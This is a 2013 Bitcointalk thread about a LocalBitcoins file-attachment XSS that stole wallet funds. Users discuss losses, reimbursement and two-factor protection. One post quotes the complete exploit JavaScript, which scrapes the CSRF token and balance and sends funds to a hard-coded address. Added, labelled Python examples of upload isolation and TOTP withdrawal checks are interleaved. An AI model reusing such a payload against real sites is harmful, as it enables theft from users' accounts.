Bitcoin Forum

Economy => Service Discussion => Topic started by: herzmeister on September 13, 2013, 12:05:38 AM



Title: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:05:38 AM
LocalBitcoins.com exploit!

Do NOT open any attachments within the site's messaging system!

https://localbitcoins.com/forums/#!/general-discussion#regarding-the-passport-imag



Title: Re: LocalBitcoins.com exploit!
Post by: superduh on September 13, 2013, 12:07:59 AM
attachments such as? exe files?.....


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:11:53 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:18:06 AM
FAIL!

traders probably don't have their life savings in there, but they do keep what they need for their daily business there


Title: Re: LocalBitcoins.com exploit!
Post by: bbit on September 13, 2013, 12:33:24 AM
LocalBitcoins, isn't that where people actually meet in person? Why are there bitcoins on the site?


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:35:58 AM
LocalBitcoins, isn't that where people actually meet in person? Why are there bitcoins on the site?

To put them into the site's escrow for example. And the site features not only in-person trading but also various forms of online trading.


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 12:40:01 AM
Localbitcoins is one of the few places where I can pick up some BTC with Paypal (at a premium of course) . I hope this doesn't affect traders...


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 12:43:54 AM
I hope this doesn't affect traders...

if you dare to take a glimpse into the forums right now... Rome is burning!


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 12:48:07 AM
I hope this doesn't affect traders...

if you dare to take a glimpse into the forums right now... Rome is burning!

Talk of lawsuits and losses of 13BTC+
Ouch...


Title: Re: LocalBitcoins.com exploit!
Post by: stex2009 on September 13, 2013, 01:14:40 AM
Many lost over 5 BTC. Not sure how much is true, but most of the posters there are decent sellers.


Title: Re: LocalBitcoins.com exploit!
Post by: will1982 on September 13, 2013, 01:21:41 AM
Many lost over 5 BTC. Not sure how much is true, but most of the posters there are decent sellers.

Have you personally lost anything?


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 01:27:51 AM
How does it work exactly? Does it release escrow? Does it send bitcoins from the wallet (impossible with 2FA)?


Title: Re: LocalBitcoins.com exploit!
Post by: DannyHamilton on September 13, 2013, 01:40:29 AM
Many lost over 5 BTC. Not sure how much is true, but most of the posters there are decent sellers.

Have you personally lost anything?

I expect to be out 4.7 bitcoins depending on how they resolve the issue.


Title: Re: LocalBitcoins.com exploit!
Post by: cbhelp on September 13, 2013, 01:45:01 AM
Coinbase is the way.

Hope you all get repaid.


Title: Re: LocalBitcoins.com exploit!
Post by: culexevilman on September 13, 2013, 01:49:37 AM
I hope they are fixing this shit, cause a shitstorm is coming...


Title: Re: LocalBitcoins.com exploit!
Post by: Fiyasko on September 13, 2013, 01:54:34 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 01:58:09 AM
Great news

Quote from: Jeremias
Attachments will stay disabled for the time being. We will consider whether to disable the feature altogether.
The total loss related to the file upload scam is very likely 82 BTC. I will start covering losses soon.

And cashouts are working again.


Title: Re: LocalBitcoins.com exploit!
Post by: Cryddit on September 13, 2013, 04:22:31 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 05:03:34 AM
If you are an active seller on LocalBitcoins it's helpful to keep some bitcoins in the wallet in order to be able to fund sales efficiently.

I keep just enough to fund the maximum sale amount I have listed in my ads.


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:38:00 AM
I lost 2.23 BTC to this and I'm not happy. And you can't even do online sales unless you have BTC in your wallet, because they go into escrow most of the time.



Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:50:48 AM
Localbitcoins is one of the few places where I can pick up some BTC with Paypal (at a premium of course) . I hope this doesn't affect traders...

Of course it's going to affect everyone. I don't even feel comfortable using the site now that I just lost about $300+ in bitcoin. It could have been much worse too, because I had about 11 BTC on there just a couple of hours earlier. Thank goodness I sold most of it before then.


Title: Re: LocalBitcoins.com exploit!
Post by: melon on September 13, 2013, 05:55:22 AM
Did the site offer 2FA on individual user accounts? I've never used the site but was eventually thinking of trying it... I think I'll wait!


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 05:57:04 AM
Did the site offer 2FA on individual user accounts? I've never used the site but was eventually thinking of trying it... I think I'll wait!

Yes, I had two-factor enabled on my other account, but not on this one. I hadn't gotten around to putting it on this one, which turned out to be a big mistake. But it wasn't even a problem with someone hacking my password or anything else... it was a flaw with the LBC site. Although I should have enabled it; just a costly bit of laziness there.


Title: Re: LocalBitcoins.com exploit!
Post by: DannyHamilton on September 13, 2013, 06:13:44 AM
Many lost over 5 BTC. Not sure how much is true, but most of the posters there are decent sellers.

Have you personally lost anything?

I expect to be out 4.7 bitcoins depending on how they resolve the issue.

Turns out I lost nothing.

They re-enabled the withdrawals, and I was able to pull out my 4.7 BTC.

The last claim I saw, they stated that they would restore all accounts that lost bitcoins to the hack/scam.



Title: Re: LocalBitcoins.com exploit!
Post by: mrkent on September 13, 2013, 06:32:03 AM
Turns out I lost nothing.

They re-enabled the withdrawals, and I was able to pull out my 4.7 BTC.

The last claim I saw, they stated that they would restore all accounts that lost bitcoins to the hack/scam.

Where did you see that?

Anyone interested in joining a bailout fund in exchange for equity with localbitcoins? I've been interested in their equity for a while now, but they've never needed funding until perhaps now. It's been generally an excellent service but lately, they've been pushing out new features very fast. Even some simple UI changes can do the site a lot of good.


Title: Re: LocalBitcoins.com exploit!
Post by: spiccioli on September 13, 2013, 06:35:29 AM

Turns out I lost nothing.


Same for me, I pulled out my 2.4 BTCs, but I've been idle for weeks on localbitcoins, so I did not read anything from the site.

spiccioli


Title: Re: LocalBitcoins.com exploit!
Post by: sturle on September 13, 2013, 07:21:44 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?


Title: Re: LocalBitcoins.com exploit!
Post by: willphase on September 13, 2013, 07:52:57 AM
a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?

The address in the script is actually 12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c, so it looks like less than 100 BTC has been stolen. The bug was a plain XSS: localbitcoins seemed to correctly use a CSRF token, but since this wasn't CSRF (the JavaScript was running in the context of localbitcoins.com) it didn't help.

The solution (in retrospect, so not particularly helpful, but perhaps others will learn from this) is to do what Google does and put all unsanitised user content (e.g. attachments, forums, anything the user can control) on a separate domain. Google uses the domain googleusercontent.com for all Gmail attachments, so even if an attacker is able to get JavaScript running, it has no access to the real site due to the same-origin policy.

Will

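The separate-origin mitigation described in the post above, as an added example; this is not LocalBitcoins' code and not part of the original thread. It is in Python because the field name csrfmiddlewaretoken in the exploit indicates a Django application; the origin names app.example and files.example, the magic-byte allow-list and the serve_upload() interface are assumptions for illustration. The handler refuses to answer for uploads on the application origin at all, derives the Content-Type from the bytes rather than from the uploaded filename (so a renamed HTML file is never served as an image, and never as HTML), forces a download with Content-Disposition: attachment, and adds nosniff and a sandbox CSP as defence in depth. The separate, cookieless origin is the real boundary; the headers only reduce what goes wrong if something is rendered anyway.

```python
import re

APP_ORIGIN = "app.example"            # assumed: origin that carries the session cookie
USERCONTENT_ORIGIN = "files.example"  # assumed: separate, cookieless origin for uploads

# Allow-list keyed on magic bytes: the served type comes from the content,
# never from the uploader's filename or declared Content-Type.
MAGIC_TYPES = (
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"%PDF-", "application/pdf"),
)

# Markup a browser might execute if it ever rendered the bytes inline.
ACTIVE_MARKUP = re.compile(
    rb"<!doctype\s+html|<html|<script|<svg|<\?xml|<iframe|<object|<embed",
    re.IGNORECASE,
)


def sniff_type(data: bytes) -> str:
    """Content type from magic bytes; unknown content is an opaque download."""
    for magic, ctype in MAGIC_TYPES:
        if data.startswith(magic):
            return ctype
    return "application/octet-stream"


def looks_active(data: bytes) -> bool:
    """True if the first KiB contains markup (also catches image/HTML polyglots)."""
    return ACTIVE_MARKUP.search(data[:1024]) is not None


def safe_filename(name: str) -> str:
    """Basename only, restricted charset, so it cannot break the header or carry a path."""
    base = name.replace("\\", "/").split("/")[-1]
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base)
    return base or "download"


def serve_upload(host: str, filename: str, data: bytes) -> dict:
    """Response for an attachment download: {"status", "headers", "body"}.

    Uploads are only ever answered on USERCONTENT_ORIGIN.  On APP_ORIGIN (or any
    other host) the route does not exist, so no bug elsewhere can put user bytes
    into a page that shares the wallet's session cookie.
    """
    if host.lower() != USERCONTENT_ORIGIN:
        return {"status": 404, "headers": {}, "body": b""}

    ctype = sniff_type(data)
    if looks_active(data):
        ctype = "application/octet-stream"  # never let the browser guess or render

    headers = {
        "Content-Type": ctype,
        "Content-Disposition": 'attachment; filename="%s"' % safe_filename(filename),
        "X-Content-Type-Options": "nosniff",
        # Defence in depth: even if something did render it, no script, no origin.
        "Content-Security-Policy": "sandbox; default-src 'none'",
        "Cache-Control": "private, no-store",
    }
    return {"status": 200, "headers": headers, "body": data}


if __name__ == "__main__":
    # Constructed sample: an HTML file uploaded under an image name, as in the thread.
    crafted = b"<html><body><script>alert(1)</script></body></html>"
    print(serve_upload(USERCONTENT_ORIGIN, "passport.jpg", crafted)["headers"])
    print(serve_upload(APP_ORIGIN, "passport.jpg", crafted)["status"])
```

Links to attachments in the trade messaging then point at files.example only, and that host sets no cookies and serves nothing but this route. A script that does run there cannot reach /accounts/wallet/ on the application origin, which is exactly the request the posted exploit depends on.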

Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 08:15:09 AM
Over and over and over and over again ... I come to the conclusion that the overwhelming proportion of bitcoin users and bitcoin startups simply lack the basic mental requirements to deal with something like money. Events like this make me miss my good old banker, who is completely incompetent at giving any advice but knows how not to get into conflict with the law, and gives me the security that my money stays even when the IT system fails.

Bitcoin has a long, long way to go.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever within the system, ready for the future, but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Tell me: who of you has any idea how the money business works? Who of you has any degree in economics? Who of you has ever seen a bank office from the inside?

Don't write code, go to your local bank, ask for an internship and learn how money works.


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 08:18:01 AM
localbitcoins.com have optional 2FA but that goes only for logon, and not for withdrawals; you're already logged on when that happens.

a simple HTML with JavaScript that steals the current user's bitcoins from their on-site wallet.

over 1000 BTC stolen already.
https://blockchain.info/address/1EfEy1Ms6swbnfsL3VfLiY3asf9dhDCoCu
Most of those transactions date back to June or earlier.  Is the bug that old?

sorry, false report then it seems; although i believe the damage is way over 80 BTC if you skim over their forums.


Title: Re: LocalBitcoins.com exploit!
Post by: GoldSilverBitcoin on September 13, 2013, 08:20:45 AM
Regardless, the community should create alternative websites. Perhaps a coder could even pool on the p2p listings across multiple websites.


Title: Re: LocalBitcoins.com exploit!
Post by: sturle on September 13, 2013, 08:38:12 AM
sorry, false report then it seems; although i believe the damage is way over 80 BTC if you skim over their forums.
I see some people yelling and calling their lawyers. People who have enough BTC in an online wallet to pay a lawyer to do anything meaningful about this are incompetent in the first place. Fees for a decent lawyer start at 4 BTC an hour at least, and this involves dealings with a foreign company (most likely). I wasn't affected, but if I was I would certainly sit back and see how it turned out before calling anyone. A couple of weeks of trading fees is enough to reimburse all users. Stupid USAnians seem to cling to their lawyers every time something unexpected happens.


Title: Re: LocalBitcoins.com exploit!
Post by: Nemesis on September 13, 2013, 09:09:11 AM
Over and over and over and over again ... I come to the conclusion that the overwhelming proportion of bitcoin users and bitcoin startups simply lack the basic mental requirements to deal with something like money. Events like this make me miss my good old banker, who is completely incompetent at giving any advice but knows how not to get into conflict with the law, and gives me the security that my money stays even when the IT system fails.

Bitcoin has a long, long way to go.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever within the system, ready for the future, but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Tell me: who of you has any idea how the money business works? Who of you has any degree in economics? Who of you has ever seen a bank office from the inside?

Don't write code, go to your local bank, ask for an internship and learn how money works.

What an idiot.

Most online banking in the US is unsecured without 2FA. Many experts have spoken about this. In Europe, many banks give their customers a card reader as a form of 2FA when doing online banking.

Banks don't give you your money back if your online banking password is compromised (go read the damn fine print). Your good old bankers have given you a false sense of security.

Same with the credit card "smart" chip: they use it to protect merchants, NOT the card holders. Anyone can pick up your card, somehow guess your PIN (believe it or not, many people use their birthdate as PIN) and go on a shopping spree. In the good old days without smart chips, the merchant had to check the signature on the back of your card for every single transaction.

Yeah those are experts!


Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 09:31:42 AM
Over and over and over and over again ... I come to the conclusion that the overwhelming proportion of bitcoin users and bitcoin startups simply lack the basic mental requirements to deal with something like money. Events like this make me miss my good old banker, who is completely incompetent at giving any advice but knows how not to get into conflict with the law, and gives me the security that my money stays even when the IT system fails.

Bitcoin has a long, long way to go.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever within the system, ready for the future, but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Tell me: who of you has any idea how the money business works? Who of you has any degree in economics? Who of you has ever seen a bank office from the inside?

Don't write code, go to your local bank, ask for an internship and learn how money works.

What an idiot.

Most online banking in the US is unsecured without 2FA. Many experts have spoken about this. In Europe, many banks give their customers a card reader as a form of 2FA when doing online banking.

??? Every bank account I have used for the last ten years uses simple 2FA by SMS.

Quote
Banks don't give you your money back if your online banking password is compromised (go read the damn fine print). Your good old bankers have given you a false sense of security.

They use 2FA. I don't know what your point is.

Quote
Same with the credit card "smart" chip: they use it to protect merchants, NOT the card holders. Anyone can pick up your card, somehow guess your PIN (believe it or not, many people use their birthdate as PIN) and go on a shopping spree. In the good old days without smart chips, the merchant had to check the signature on the back of your card for every single transaction.

If someone uses his birthday as a PIN, nobody can help him. And even in this case: one call to your bank (most offer emergency lines), and the card is closed. Most cards have a transaction limit of 1,500 / day, so the damage is reduced. Often the transaction isn't processed at that moment and will never be processed, or it can be charged back. My EC card was stolen several times and I didn't lose a cent.

Also: every bank has insurance. If their IT fails, the insurance covers the customers' accounts. If there are provable fraudulent transactions, the insurance pays. And so on.

The only risk I know of are those stupid shops which accept EC cards by signature. But even in this case, if someone shops for thousands of euros: if you can prove it was not your signature, then the insurance will pay. And you will be able to prove it, because every shop needs to keep the receipts. If it doesn't, its insurance has to pay.

On Bitcointalk nearly every day I find a thread about fraud or a scam, someone who loses his account on a wallet due to hackers or stupidity. If either happens with a bank, in most cases they get their money back. Here I have seen nearly no case where anybody could help them get their money back. No chance. Whoever has your private key can transfer your money to his address and there's absolutely no chance you ever get it back.

blockchain.info is the only case I know of which replaced the amount, out of their own money. This is the way it has to be; this gives me hope.

The problem is not the code. Bitcoin's code is by far better than the bankers' code. The problem is the organization, or rather the lack of professional organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money that ever existed.

My totally incompetent banker offers me an insurance system and a banking system and a law system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.



Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 09:33:42 AM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them. Exactly the same if you want to sell them in another marketplace like Mt.Gox or Bitstamp.
If you don't want to use these services you need to sell privately without escrow... and I trust a company more than the average private seller... How did you buy your bitcoins, sir?


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 11:37:44 AM
The problem is not the code. Bitcoin's code is by far better than the bankers' code. The problem is the organization, or rather the lack of professional organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money that ever existed.

My totally incompetent banker offers me an insurance system and a banking system and a law system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.
I expect a system which provides those services will exist within six months.


Title: Re: LocalBitcoins.com exploit!
Post by: Itcher on September 13, 2013, 11:55:43 AM
The problem is not the code. Bitcoin's code is by far better than the bankers' code. The problem is the organization, or rather the lack of professional organisation. I hope it will come, but by now bitcoin is the most user-unfriendly kind of money that ever existed.

My totally incompetent banker offers me an insurance system and a banking system and a law system which was made to protect me as a consumer.

I don't say bitcoin won't have this. I hope it will.
I expect a system which provides those services will exist within six months.

You're joking?

Such systems need years to eat through regulation-walls, they need billions in the background to make insurance profitable, and they need years of organizing and planning and so on. There is no shortcut.

There are miles between this and every actual company involved in bitcoin atm.

we'll see it in years. Maybe. If the interest in bitcoins survives.


Title: Re: LocalBitcoins.com exploit!
Post by: tclo on September 13, 2013, 12:02:08 PM
I got this from LBC and they were true to their word:

"Hi,

As you all probably know, there was a security exploit on LocalBitcoins.com document uploads allowing one user to steal wallet funds with a specially crafted file.

You are being contacted for the reimbursement. We will pay reimbursements automatically for those users who have enabled two-factor authentication since the incident.

If you don't have two-factor authentication enabled and still want the reimbursement right away, just reply to this email. You can also request the reimbursement directly to some other bitcoin address.

For the rest we will reserve some time, so that people can enable two-factor protection. You can enable two-factor even without a smartphone with desktop applications and feature phone apps. See more info about the two-factor authentication here https://localbitcoins.com/guides/security#two-factor

Sincerest apologies for the incident.

- Jeremias Kangas / LocalBitcoins.com"

I enabled two factor and the stolen BTC are back in my acct now.


Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 13, 2013, 12:07:44 PM
Such systems need years to eat through regulation-walls, they need billions in the background to make insurance profitable, and they need years of organizing and planning and so on. There is no shortcut.
We'll see.

BTW, I consider dealing with regulation-walls to be a waste of time and resources. Limiting Bitcoin business models to only the ones sanctioned by governments is like inventing the automobile but artificially restricting it to horse-drawn carriage speeds.


Title: Re: LocalBitcoins.com exploit!
Post by: escrow.ms on September 13, 2013, 12:12:52 PM
They should enable email based authentication or at least security questions for bitcoin withdrawals.


Title: Re: LocalBitcoins.com exploit!
Post by: runeks on September 13, 2013, 12:43:32 PM
This is the exploit in question:

Code:
// The attachment is an HTML file served from localbitcoins.com itself, so this
// runs in the site's origin with the victim's session cookies and the site's own
// jQuery ($).  Nothing here crosses an origin, which is why the CSRF token did not
// help: the script reads it straight out of the wallet page.  loadpic() is the
// entry point; whatever invoked it inside the attachment is not part of this excerpt.
function loadpic() {
    // Step 1: fetch the victim's own wallet page (session cookie is sent automatically).
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    // Step 3: submit the site's own "Send from wallet" form with the scraped token.
    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,        // Django CSRF token taken from the page
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    // Step 2: scrape the wallet HTML with regular expressions.
    function walh(html) {
        var csrftoken = '';
        var btc = 0;
        // A two-factor code field (id_token) on the send form means the POST
        // needs a code this script cannot produce, so it gives up on that account.
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            return;
        }
        // Hidden CSRF input rendered into the form.
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        // Displayed balance, e.g. "Wallet: 4.70 BTC".
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        // toFixed() returns a string; the comparison and subtraction below coerce
        // it back to a number.  Balances under 0.02 BTC are skipped and 0.01 BTC
        // is left behind; everything else goes to the hard-coded address.
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051

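The script above bails out as soon as it sees an id_token field on the send form, which is the whole argument for demanding a second factor at the moment of withdrawal and not only at login (the thread disagrees about which of the two LocalBitcoins enforced at the time). The following is an added example and not LocalBitcoins' code: the TOTP construction follows RFC 6238, while the Wallet class, its page markup, field names and return strings are assumptions for illustration. scrape_page() re-implements the three regular expressions of the posted script so the two paths can be compared: with a same-origin XSS the attacker gets the CSRF token and the balance for free, but without the TOTP secret the withdrawal is refused, and a code observed once cannot be replayed within its time step.

```python
import hashlib
import hmac
import re
import secrets
import struct
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, now: int, step: int = 30) -> str:
    """RFC 6238 TOTP: HOTP with the 30 s time step as the counter."""
    return hotp(secret, now // step)


def scrape_page(html: str) -> dict:
    """What the posted exploit pulled out of the wallet page, with its own regexes."""
    csrf = re.search(r".csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)", html)
    bal = re.search(r"Wallet: ([0-9,.-]+) BTC", html)
    return {
        "has_2fa": re.search(r"label for=.(id_token)", html) is not None,
        "csrf": csrf.group(1) if csrf else None,
        "balance": float(bal.group(1)) if bal else None,
    }


class Wallet:
    """Assumed server-side model: one user's balance, CSRF token and TOTP secret."""

    STEP = 30

    def __init__(self, balance: float, totp_secret: Optional[bytes]):
        self.balance = balance
        self.totp_secret = totp_secret          # None = second factor not enrolled
        self.csrf_token = secrets.token_hex(16)
        self._last_step = -1                    # each time step's code is accepted once

    def render_page(self) -> str:
        """Wallet page as a same-origin script sees it (markup is assumed)."""
        form = "<input name='csrfmiddlewaretoken' value='%s'>" % self.csrf_token
        if self.totp_secret is not None:
            form += "<label for='id_token'>Two-factor code</label><input name='token'>"
        return "<p>Wallet: %.2f BTC</p><form>%s</form>" % (self.balance, form)

    def withdraw(self, amount: float, address: str, csrf_token: Optional[str],
                 code: Optional[str], now: int) -> str:
        """Returns "ok", or the name of the first check that failed."""
        if csrf_token is None or not hmac.compare_digest(csrf_token, self.csrf_token):
            return "csrf"
        if self.totp_secret is not None:
            if code is None or not code.isascii():
                return "2fa"
            step = now // self.STEP
            matched = None
            for candidate in (step, step - 1):  # tolerate one step of clock drift
                if candidate > self._last_step and hmac.compare_digest(
                        code, hotp(self.totp_secret, candidate)):
                    matched = candidate
                    break
            if matched is None:
                return "2fa"                    # wrong code, or one already used
            self._last_step = matched
        if amount <= 0 or amount > self.balance:
            return "funds"
        self.balance = round(self.balance - amount, 8)
        return "ok"


if __name__ == "__main__":
    # Constructed scenario: secret and timestamp are arbitrary sample values.
    secret, now, dest = b"0123456789abcdef0123", 1_000_000_000, "1ExampleAddressXXXXXXXXXXXXXXXXXXX"
    w = Wallet(5.0, secret)
    seen = scrape_page(w.render_page())          # what the XSS would learn
    print(w.withdraw(seen["balance"] - 0.01, dest, seen["csrf"], None, now))   # 2fa
    print(w.withdraw(1.0, dest, seen["csrf"], totp(secret, now), now))         # ok
```

The CSRF token is still checked, but it is only a cross-site defence: once script runs in the application's origin the token is readable, exactly as the exploit showed. The TOTP code is the one input the page never contains, which is why the script had to skip accounts that asked for it.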

Title: Re: LocalBitcoins.com exploit!
Post by: Mike Hearn on September 13, 2013, 02:18:13 PM
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.


Title: Re: LocalBitcoins.com exploit!
Post by: herzmeister on September 13, 2013, 02:23:07 PM
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for either buyer or seller. All that's required is that the seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.


Title: Re: LocalBitcoins.com exploit!
Post by: marcovaldo on September 13, 2013, 02:50:44 PM
Did you personally lose anything?


Title: Re: LocalBitcoins.com exploit!
Post by: MPOE-PR on September 13, 2013, 02:54:57 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever within the system, ready for the future, but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Don't write code, go to your local bank, ask for an internship and learn how money works.

This, basically. With the addendum that not everyone is cut out to run a business (https://bitcointalk.org/index.php?topic=124441.0). And the post-script that paying attention to what the actually capable (http://trilema.com/category/bitcoin/) have to say is a necessary step.


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 13, 2013, 02:56:34 PM
Bitcoin withdrawals should be authenticated through email.


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 13, 2013, 03:02:44 PM
Bitcoin withdrawals should be authenticated through email.

With 2FA I think it's enough.


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 13, 2013, 03:04:20 PM
Bitcoin withdrawals should be authenticated through email.

With 2FA I think it's enough.

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different sim card


Title: Re: LocalBitcoins.com exploit!
Post by: Cryddit on September 13, 2013, 03:29:35 PM
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought from Bitstamp, and moved them to my private wallet the instant they showed up in my Bitstamp account.

Some I got as pay: I made machine parts for someone. She wanted to pay me in Bitcoin, I said sure.

Some others I got as pay: I wrote code for somebody who wanted special exclusive super-secret software to analyze an enormously big pile of data, and paid in Bitcoin to keep it private from someone else looking at the bank account.

Some others I got as pay: my main job, security consulting. I look at malware, see what it does by reading the machine code, figure out how to clean infected machines. Clients implement, or I implement, cleaning software, which the clients then sell. Pays well. Twice now I asked to be paid in Bitcoin, they said 'sure, whatever'.

A couple I bought directly in person, smartphone to smartphone, from a speculator who got nervous back when the price was USD$60.



Title: Re: LocalBitcoins.com exploit!
Post by: joesmoe2012 on September 13, 2013, 06:26:24 PM
You can make 2FA work with different SIMs, I have, it's not that difficult. Just back up and then restore.

Everybody should be using 2FA if you're dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins' behalf in paying out of their own pocket for all the stolen coins.


Title: Re: LocalBitcoins.com exploit!
Post by: smoothie on September 14, 2013, 03:37:02 AM
As the saying goes:

Those who fail to learn from history are doomed to repeat it.




Title: Re: LocalBitcoins.com exploit!
Post by: justusranvier on September 14, 2013, 03:40:39 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.


Title: Re: LocalBitcoins.com exploit!
Post by: joesmoe2012 on September 14, 2013, 08:51:22 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.


Title: Re: LocalBitcoins.com exploit!
Post by: BitAddict on September 14, 2013, 11:22:17 AM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.


Title: Re: LocalBitcoins.com exploit!
Post by: johnyj on September 14, 2013, 12:15:56 PM
At least an email-based 2FA is much better.


Title: Re: LocalBitcoins.com exploit!
Post by: rufusBTC on September 14, 2013, 05:10:08 PM
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.

